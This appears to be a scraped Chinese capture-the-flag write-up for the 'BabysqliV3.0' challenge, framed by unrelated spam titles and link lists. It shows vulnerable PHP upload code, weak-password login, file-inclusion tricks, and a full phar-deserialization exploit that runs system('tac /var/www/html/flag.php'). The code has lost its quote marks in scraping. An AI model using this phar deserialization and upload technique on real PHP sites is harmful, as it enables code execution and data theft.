当前位置: 首页 > news >正文

后台网站地图彩票网站开发需要多少钱

后台网站地图,彩票网站开发需要多少钱,广告宣传,网站tag 怎么实现文章目录 [BabysqliV3.0]phar反序列化 [BabysqliV3.0]phar反序列化 开始以为是sql注入 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ST1jvadM-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032140269.png)… 文章目录 [BabysqliV3.0]phar反序列化 [BabysqliV3.0]phar反序列化 开始以为是sql注入 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ST1jvadM-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032140269.png)] 账号为admin一直试都没反应后来发现可以弱口令密码password [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PKuBGWCd-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032141726.png)] 一个文件上传页面 在file参数存在文件包含 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eLLkRDru-1691302941345)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032143134.png)] home.php ?php session_start(); echo meta http-equiv\Content-Type\ content\text/html; charsetutf-8\ / titleHome/title; error_reporting(0); if(isset($_SESSION[user])){if(isset($_GET[file])){if(preg_match(/.?f.?l.?a.?g.?/i, $_GET[file])){die(hacker!);}else{if(preg_match(/home$/i, $_GET[file]) or preg_match(/upload$/i, $_GET[file])){$file $_GET[file]..php;}else{$file $_GET[file]..fxxkyou!;}echo 当前引用的是 .$file;require $file;}}else{die(no permission!);} } ?upload.php meta http-equivContent-Type contenttext/html; charsetutf-8 /form action methodpost enctypemultipart/form-data上传文件input typefile namefile /input typesubmit namesubmit value上传 / /form?php error_reporting(0); class Uploader{public $Filename;public $cmd;public $token;function __construct(){$sandbox getcwd()./uploads/.md5($_SESSION[user])./;$ext .txt;mkdir($sandbox, 0777, true);if(isset($_GET[name]) and !preg_match(/data:\/\/ | filter:\/\/ | php:\/\/ | \./i, $_GET[name])){$this-Filename $_GET[name];}else{$this-Filename $sandbox.$_SESSION[user].$ext;}$this-cmd echo brbrMaster, I want to study rizhan!brbr;;$this-token $_SESSION[user];}function upload($file){global $sandbox;global $ext;if(preg_match([^a-z0-9], $this-Filename)){$this-cmd die(illegal filename!);;}else{if($file[size] 1024){$this-cmd die(you are too big (′▽〃));;}else{$this-cmd move_uploaded_file(.$file[tmp_name]., . $this-Filename . );;}}}function __toString(){global $sandbox;global $ext;// return $sandbox.$this-Filename.$ext;return $this-Filename;}function __destruct(){if($this-token ! $_SESSION[user]){$this-cmd die(check token falied!);;}eval($this-cmd);} }if(isset($_FILES[file])) {$uploader new Uploader();$uploader-upload($_FILES[file]);if(file_get_contents($uploader)){echo 下面是你上传的文件br.$uploader.br;echo file_get_contents($uploader);} }?这题有两个非预期解 if(isset($_GET[name]) and !preg_match(/data:\/\/ | filter:\/\/ | php:\/\/ | \./i, $_GET[name])){$this-Filename $_GET[name];}if(file_get_contents($uploader)){echo 下面是你上传的文件br.$uploader.br;echo file_get_contents($uploader); } 我们可以控制文件名的参数并且获取文件名的文件内容 非预期解1 我们直接读flag.php: 非预期解2 我们可以直接上传一个shell 预期解 phar反序列化 难点主要是需要绕过token function __destruct(){if($this-token ! $_SESSION[user]){$this-cmd die(check token falied!);;}eval($this-cmd);}但是如果上次文件不加name参数会讲session写入文件名 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6eEMtHuE-1691302941346)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032150189.png)] 随便上传一个文件获取token 构造phar文件 ?phpclass Uploader{public $Filename;public $cmd system(tac /var/www/html/flag.php);;public $token GXY2088cabe1723182d413a31dd560b1766; }unlink(phar.phar); //先删除存在的phar.phar$phar new Phar(phar.phar); //后缀名必须为phar$phar-startBuffering();$phar-setStub(?php __HALT_COMPILER(); ?); //设置stub$o new Uploader();$phar-setMetadata($o); //将自定义的meta-data存入manifest$phar-addFromString(test.txt, test); //添加要压缩的文件//签名自动计算$phar-stopBuffering();我们将phar文件上传上去 然后在文件名中包含phar://配合file_get_contents()就会将phar反序列化获得flag
http://www.zqtcl.cn/news/436641/

相关文章:

  • 网站建设问题及解决办法网站优化过度的表现
  • html5手机网站教程合肥企业网站营销电话
  • 公司网站引导页建设银行网站怎么登录密码忘了怎么办
  • iis7 网站打不开做兼职哪个网站好
  • 惠州网站制作网站iot物联网平台开发
  • 龙岩门户网站最新仿58同城网站源码
  • 简单的企业小网站南宁最新消息今天
  • 美橙表业手表网站公司推广渠道
  • 大连网站排名优化价格wordpress锚文字
  • 漯河网做网站南京市建设工程档案馆网站
  • 重庆可以建建网站的平台天眼查 企业查询官网
  • gta5单机买房子网站在建设免费建小程序网站
  • 怎么制作网站设计图片劳动保障局瓯海劳务市场和做网站
  • 视屏网站制作青岛平台网站建设
  • asp网站做搜索义乌网站建设工作室
  • .net网站开发环境wordpress添加特效
  • 常州 网站制作如何找专业的网站建设公司
  • 陕西网络营销优化公司seo搜索价格
  • 山东通信局报备网站东营城镇建设规划网站
  • 建设银行如何招聘网站网站开发转包协议
  • 主流网站建设服务器有哪些电商平台
  • 网站与数据库的联系wordpress改为中文
  • 如何不让百度收录网站wix和wordpress比较
  • php开源网站 网上商城网站建设公司做销售好不好
  • 网站开发学哪种语言网站加水印
  • 帮人家做网站维护女性手机网站模板
  • 给一个企业做网站苏州网站备案查询
  • 域名备案期间怎么做网站广告投放行业
  • wordpress站内搜索统计网站突然不收录了
  • 网站源码小千个人网做网页设计一个月能挣多少